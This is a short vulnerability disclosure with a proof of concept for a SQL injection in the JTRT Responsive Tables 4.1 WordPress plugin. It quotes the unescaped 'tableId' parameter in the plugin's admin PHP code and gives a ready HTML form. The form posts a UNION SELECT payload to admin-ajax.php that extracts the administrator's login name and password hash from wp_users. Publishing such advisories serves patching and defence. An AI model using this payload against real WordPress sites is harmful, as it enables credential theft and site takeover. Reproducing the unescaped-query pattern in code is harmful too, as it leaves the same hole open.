WordPress JTRT Responsive Tables 4.1 SQL Injection
Posted on 04 November 2017
# Exploit Title: JTRT Responsive Tables 4.1 a WordPress Plugin a Sql Injection # Exploit Author: Lenon Leite # Vendor Homepage: https://wordpress.org/plugins/jtrt-responsive-tables/ # Software Link: https://wordpress.org/plugins/jtrt-responsive-tables/ # Contact: http://twitter.com/lenonleite # Website: http://lenonleite.com.br/ # Category: webapps # Version: 4.1 # Tested on: Ubuntu 16.04 Description: Type user acces: single user. $_POST[atableIda] is not escaped. http://lenonleite.com.br/en/blog/2017/09/11/jtrt-responsive-tables-wordpress-plugin-sql-injection/ File / Code: Path: /wp-content/plugins/jtrt-responsive-tables/admin/class-jtrt-responsive-tables-admin.php Line : 183 $getTableId = $_POST['tableId']; ... $retrieve_data = $wpdb->get_results( "SELECT * FROM $jtrt_tables_name WHERE jttable_IDD = " . $getTableId ); Proof of Concept: 1 a Log in with single user. 2 a Using form, sqli by post: <form method="post" action="http://target.dev/wp-admin/admin-ajax.php?action=get_old_table"> <input type="text" name="tableId" value="1 UNION SELECT 1,2,CONCAT(user_login,char(58),user_pass),4,5 FROM wp_users WHERE ID=1"> <input type="submit" name=""> </form> 08/09/2017 a Discovered 11/09/2017 a Vendor finded 03/11/2017 a Publish
